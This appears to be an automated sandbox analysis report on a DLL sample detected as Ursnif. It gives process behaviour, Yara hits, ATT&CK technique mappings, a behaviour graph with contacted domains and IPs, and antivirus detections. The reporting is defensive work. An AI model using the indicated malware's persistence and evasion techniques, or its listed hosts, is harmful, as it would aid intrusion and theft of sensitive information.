            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4448Thread sleep time: -1667865539s >= -30000sJump to behavior
            Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001BAC LoadLibraryA,GetProcAddress,0_2_10001BAC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D0823 mov eax, dword ptr fs:[00000030h]0_2_003D0823
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D08B4 mov eax, dword ptr fs:[00000030h]0_2_003D08B4
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D04AF mov eax, dword ptr fs:[00000030h]0_2_003D04AF
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D06DF mov eax, dword ptr fs:[00000030h]0_2_003D06DF
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D07C8 mov eax, dword ptr fs:[00000030h]0_2_003D07C8
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F206DF mov eax, dword ptr fs:[00000030h]2_2_02F206DF
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F208B4 mov eax, dword ptr fs:[00000030h]2_2_02F208B4
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F204AF mov eax, dword ptr fs:[00000030h]2_2_02F204AF
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F20823 mov eax, dword ptr fs:[00000030h]2_2_02F20823
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F207C8 mov eax, dword ptr fs:[00000030h]2_2_02F207C8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_027C0823 mov eax, dword ptr fs:[00000030h]6_2_027C0823
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_027C06DF mov eax, dword ptr fs:[00000030h]6_2_027C06DF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_027C08B4 mov eax, dword ptr fs:[00000030h]6_2_027C08B4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_027C04AF mov eax, dword ptr fs:[00000030h]6_2_027C04AF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_027C07C8 mov eax, dword ptr fs:[00000030h]6_2_027C07C8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00260823 mov eax, dword ptr fs:[00000030h]21_2_00260823
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_002604AF mov eax, dword ptr fs:[00000030h]21_2_002604AF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_002608B4 mov eax, dword ptr fs:[00000030h]21_2_002608B4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_002607C8 mov eax, dword ptr fs:[00000030h]21_2_002607C8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_002606DF mov eax, dword ptr fs:[00000030h]21_2_002606DF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_030F07C8 mov eax, dword ptr fs:[00000030h]29_2_030F07C8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_030F06DF mov eax, dword ptr fs:[00000030h]29_2_030F06DF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_030F04AF mov eax, dword ptr fs:[00000030h]29_2_030F04AF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_030F0823 mov eax, dword ptr fs:[00000030h]29_2_030F0823
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_030F08B4 mov eax, dword ptr fs:[00000030h]29_2_030F08B4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_029D08B4 mov eax, dword ptr fs:[00000030h]33_2_029D08B4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_029D04AF mov eax, dword ptr fs:[00000030h]33_2_029D04AF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_029D06DF mov eax, dword ptr fs:[00000030h]33_2_029D06DF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_029D0823 mov eax, dword ptr fs:[00000030h]33_2_029D0823
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_029D07C8 mov eax, dword ptr fs:[00000030h]33_2_029D07C8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 36_2_02F008B4 mov eax, dword ptr fs:[00000030h]36_2_02F008B4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 36_2_02F00823 mov eax, dword ptr fs:[00000030h]36_2_02F00823
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 36_2_02F004AF mov eax, dword ptr fs:[00000030h]36_2_02F004AF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 36_2_02F006DF mov eax, dword ptr fs:[00000030h]36_2_02F006DF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 36_2_02F007C8 mov eax, dword ptr fs:[00000030h]36_2_02F007C8
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1Jump to behavior
            Source: loaddll32.exe, 00000000.00000002.486059210.0000000001A10000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.486678492.0000000003310000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.485974841.0000000002FA0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: loaddll32.exe, 00000000.00000002.486059210.0000000001A10000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.486678492.0000000003310000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.485974841.0000000002FA0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: loaddll32.exe, 00000000.00000002.486059210.0000000001A10000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.486678492.0000000003310000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.485974841.0000000002FA0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: loaddll32.exe, 00000000.00000002.486059210.0000000001A10000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.486678492.0000000003310000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.485974841.0000000002FA0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005E9135 cpuid 0_2_005E9135
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001456 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_10001456
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005E9135 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_005E9135
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001F0E CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_10001F0E

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001D.00000003.378625315.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377493351.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377965158.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311524136.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299067540.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379329065.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353519210.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452882755.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349169873.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353381101.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452739993.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311353638.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353640605.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353482543.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349379368.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299293489.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.377754049.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452599143.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.425611899.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452682864.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349425307.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349209886.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.488281426.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452790659.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349342259.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349245069.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353420356.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379402147.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.378397913.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311162481.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353660162.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.376670409.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310218293.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353285218.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299402333.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310401449.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310585045.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377140325.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310811687.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452941227.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298617487.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.377966823.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349275169.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377030195.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311655737.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349118555.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.401300061.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299506180.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379198024.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.487540264.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.457353583.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.485787977.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298330099.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.376078643.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452547670.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.442237673.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377890073.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379544002.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298892521.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353559736.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298800751.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452911252.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.376494826.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6912, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6096, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001D.00000003.378625315.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377493351.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377965158.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311524136.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299067540.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379329065.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353519210.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452882755.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349169873.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353381101.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452739993.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311353638.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353640605.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353482543.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349379368.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299293489.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.377754049.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452599143.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.425611899.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452682864.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349425307.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349209886.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.488281426.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452790659.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349342259.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349245069.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353420356.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379402147.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.378397913.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311162481.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353660162.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.376670409.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310218293.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353285218.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299402333.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310401449.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310585045.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377140325.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310811687.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452941227.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298617487.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.377966823.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349275169.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377030195.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311655737.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349118555.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.401300061.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299506180.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379198024.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.487540264.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.457353583.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.485787977.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298330099.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.376078643.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452547670.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.442237673.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377890073.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379544002.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298892521.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353559736.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298800751.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452911252.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.376494826.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6912, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6096, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation2Registry Run Keys / Startup Folder1Process Injection12Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsNative API1DLL Side-Loading1Registry Run Keys / Startup Folder1Virtualization/Sandbox Evasion1LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Process Injection12Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 454630 Sample: direction.dll Startdate: 27/07/2021 Architecture: WINDOWS Score: 76 30 alliances.bar 195.110.59.2, 49775, 49776, 49777 AS-HOSTINGERLT Lithuania 2->30 32 www.alliancer.bar 2->32 34 4 other IPs or domains 2->34 42 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected  Ursnif 2->46 8 loaddll32.exe 1 2->8         started        signatures3 process4 signatures5 52 Writes or reads registry keys via WMI 8->52 54 Writes registry values via WMI 8->54 11 regsvr32.exe 8->11         started        14 iexplore.exe 6 125 8->14         started        16 cmd.exe 1 8->16         started        18 15 other processes 8->18 process6 signatures7 56 Writes or reads registry keys via WMI 11->56 58 Writes registry values via WMI 11->58 20 iexplore.exe 9 157 14->20         started        24 iexplore.exe 14->24         started        26 iexplore.exe 14->26         started        28 rundll32.exe 16->28         started        process8 dnsIp9 36 dart.l.doubleclick.net 142.250.186.70, 443, 49740, 49741 GOOGLEUS United States 20->36 38 tls13.taboola.map.fastly.net 151.101.1.44, 443, 49753, 49754 FASTLYUS United States 20->38 40 12 other IPs or domains 20->40 48 Creates an undocumented autostart registry key 20->48 50 Writes registry values via WMI 28->50 signatures10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            direction.dll23%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            0.2.loaddll32.exe.5e0000.1.unpack100%AviraHEUR/AGEN.1108168Download File
            37.2.rundll32.exe.4950000.2.unpack100%AviraHEUR/AGEN.1108168Download File
            2.2.regsvr32.exe.10000000.4.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            9.2.rundll32.exe.4630000.2.unpack100%AviraHEUR/AGEN.1108168Download File
            13.2.rundll32.exe.4970000.2.unpack100%AviraHEUR/AGEN.1108168Download File
            2.2.regsvr32.exe.47f0000.2.unpack100%AviraHEUR/AGEN.1108168Download File
